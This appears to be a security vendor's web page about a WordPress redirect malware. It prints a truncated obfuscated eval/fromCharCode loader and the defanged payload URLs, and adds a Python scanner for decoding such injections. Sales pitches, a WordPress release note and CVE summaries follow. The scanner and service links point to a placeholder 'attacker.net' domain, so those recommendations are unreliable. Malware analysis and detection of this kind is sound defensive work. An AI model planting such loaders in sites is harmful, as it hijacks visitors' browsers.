adrequest[.]xyz Malware hitting WordPress websites

We found this new malware targeting hundreds of WordPress installations. So far it’s found in the database and in core files.

Here is an example of it:


var _0x43tbc1 = 1; eval(String.fromCharCode(118, 97, 114, 32, 97, 49, 32, 61, 32, 102, 117, 110, 99, 116, 105, 111, 110, 40, 41, 32, 123, 10, 32, 32, 32, 32, 118, ..

REMOVED…

41, 32, 123, 10, 32, 32, 32, 32, 97, 49, 40, 41, 59, 10, 125));

It then loads this JavaScript file, which causes random redirects to other websites:

hxxps://adrequest[.]xyz/ad.js

hxxps://adrequest[.]xyz/lady.php
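
The injection shown above hides its loader as a list of character codes passed to String.fromCharCode inside eval. The following Python scanner is an added example, not code from the original post: it finds such calls in a file or database dump, decodes them, and lists the hosts the hidden script references. The sample input, its example.invalid host and the function names are constructed for illustration.

```python
import re

# Optional eval( wrapper, then String.fromCharCode with decimal arguments only.
CHARCODE_RE = re.compile(
    r"(eval\s*\(\s*)?String\.fromCharCode\(\s*([\d\s,]+?)\s*\)")
HOST_RE = re.compile(r"https?://([A-Za-z0-9.-]+)")


def decode_args(arg_list):
    """Turn '118, 97, 114' into 'var'; ignore values that are not UTF-16 units."""
    codes = [int(tok) for tok in re.findall(r"\d+", arg_list)]
    return "".join(chr(c) for c in codes if c <= 0xFFFF)


def scan(text, min_codes=8):
    """Return one finding per fromCharCode call long enough to hide a payload."""
    findings = []
    for m in CHARCODE_RE.finditer(text):
        if len(re.findall(r"\d+", m.group(2))) < min_codes:
            continue  # short calls are common in legitimate scripts
        decoded = decode_args(m.group(2))
        findings.append({
            "offset": m.start(),                     # where to look in the dump
            "eval_wrapped": m.group(1) is not None,  # decoded text gets executed
            "decoded": decoded,
            "hosts": sorted({h.lower() for h in HOST_RE.findall(decoded)}),
        })
    return findings


# Constructed sample: a harmless loader string encoded the way the injection is.
PAYLOAD = 'var s=document.createElement("script");s.src="https://cdn.example.invalid/ad.js";'
SAMPLE = ("<p>Hello</p><script>var _0x1 = 1; eval(String.fromCharCode("
          + ", ".join(str(ord(c)) for c in PAYLOAD) + "));</script>"
          + "<script>var c = String.fromCharCode(65, 66);</script>")

if __name__ == "__main__":
    for f in scan(SAMPLE):
        print(f["offset"], f["eval_wrapped"], f["hosts"])
        print(f["decoded"])
```

Run it over exported post and option rows as well as theme and core files, and compare the reported hosts against the domains the site is expected to load scripts from.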

This domain is newly registered:

Domain Name: ADREQUEST[.]XYZ
Registry Domain ID: D91391898-CNIC
Registrar WHOIS Server: whois.PublicDomainRegistry.com
Registrar URL: https://publicdomainregistry.com
Updated Date: 2019-01-19T12:14:39.0Z
Creation Date: 2019-01-19T12:12:28.0Z
Registry Expiry Date: 2020-01-19T23:59:59.0Z


You can use this free malware scanner to determine if your website is infected by this malware or not: 

https://scan.attacker.net

Sign up now and let us take care of that for you and get your website cleaned immediately!

https://attacker.net/website-security-plans-pricing


How to Tell if Your Website Has Been Hacked

How to tell if your website has been hacked?

  • Do you see any strange, unrecognized or inappropriate content on your site?
  • Has your site started consuming more resources or running slowly?
  • Do you see unrecognized users, admin users, FTP or email accounts on your site?
  • Unrecognized files or folders?
  • Customers reporting stolen credit cards after purchasing something from your website?
  • Google Chrome, Firefox or other browsers showing a red warning when visiting your website?
  • Do you see any unrecognized ads, popups or redirects to other sites?
  • Your hosting provider suspended your hosting account?
  • If your site is listed as hacked or harmful in Google searches.
  • If you receive a warning from Google webmaster tools or other blacklists.
  • If Google Adwords suspended your running Ads.

There are so many other signs! Sign up now and let’s clean & protect your websites!

You can check your website’s security by using this free website malware scanner

https://scan.attacker.net

WordPress 5.0.3 is now available!

5.0.3 is a maintenance release that includes 37 bug fixes and 7 performance updates. The focus of this release was fine-tuning the new block editor, and fixing any major bugs or regressions.

Here are a few of the highlights:

For a full list of changes, please consult the list of tickets on Trac, changelog, or read a more technical summary on the Make WordPress Core blog.

You can download WordPress 5.0.3 or visit Dashboard → Updates on your site and click Update Now. Sites that support automatic background updates have already started to update automatically.

A new wave of the simpleoneline Malware

A new wave of the https://simpleoneline[.]online/online.js malware has been discovered hitting hundreds of WordPress websites. In most cases, it’s injected in the database and particularly found in the options table.

Check if your website is infected using this free malware scanner:

https://scan.attacker.net

Take a look at our malware removal service and https://attacker.net/website-security-plans-pricing

Rsync remote attack-CVE-2014-9512

rsync 3.1.1 allows remote attackers to write to arbitrary files via a symlink attack on a file in the synchronization path.

 

Timeline

January 5, 2015 MITRE reserved CVE
February 12, 2015 NVD published advisory


WordPress theme directory traversal

Directory traversal vulnerability in the Elegant Themes Divi theme for WordPress allows remote attackers to read arbitrary files via a .. (dot dot) in the img parameter in a revslider_show_image action to wp-admin/admin-ajax.php.

 

 

Timeline

February 11, 2015 NVD published advisory


WordPress plug-in arbitrary code execution

Multiple cross-site scripting (XSS) vulnerabilities in the Spider Facebook plugin before 1.0.11 for WordPress allow (1) remote attackers to inject arbitrary web script or HTML via the appid parameter in a registration task to the default URI or remote administrators to inject arbitrary web script or HTML via the (2) asc_or_desc, (3) order_by, (4) page_number, (5) serch_or_not, or (6) search_events_by_title parameter in (a) the Spider_Facebook_manage page to wp-admin/admin.php or a (b) selectpagesforfacebook or (c) selectpostsforfacebook action to wp-admin/admin-ajax.php.

 

Microsoft Internet Explorer arbitrary code execution-CVE-2015-0072

Cross-site scripting (XSS) vulnerability in Microsoft Internet Explorer 10 and 11 allows remote attackers to bypass the Same Origin Policy and inject arbitrary web script or HTML via vectors involving an IFRAME element that triggers a redirect, a second IFRAME element that does not trigger a redirect, and an eval of a WindowProxy object, aka “Universal XSS (UXSS).”

 

 

 

Xen denial of service-CVE-2015-1563

The ARM GIC distributor virtualization in Xen 4.4.x and 4.5.x allows local guests to cause a denial of service by causing a large number of messages to be logged.

Affected products

  • Xen 4.0.0
  • Xen 4.0.1
  • Xen 4.0.2
  • Xen 4.0.3
  • Xen 4.0.4
  • Xen 4.1.0
  • Xen 4.1.1
  • Xen 4.1.2
  • Xen 4.1.3
  • Xen 4.1.4
  • Xen 4.1.5
  • Xen 4.1.6.1
  • Xen 4.2.0
  • Xen 4.2.1
  • Xen 4.2.2
  • Xen 4.2.3
  • Xen 4.3.1
  • Xen 4.4.0
  • Xen 4.4.0 release candidate 1
  • Xen 4.3.0
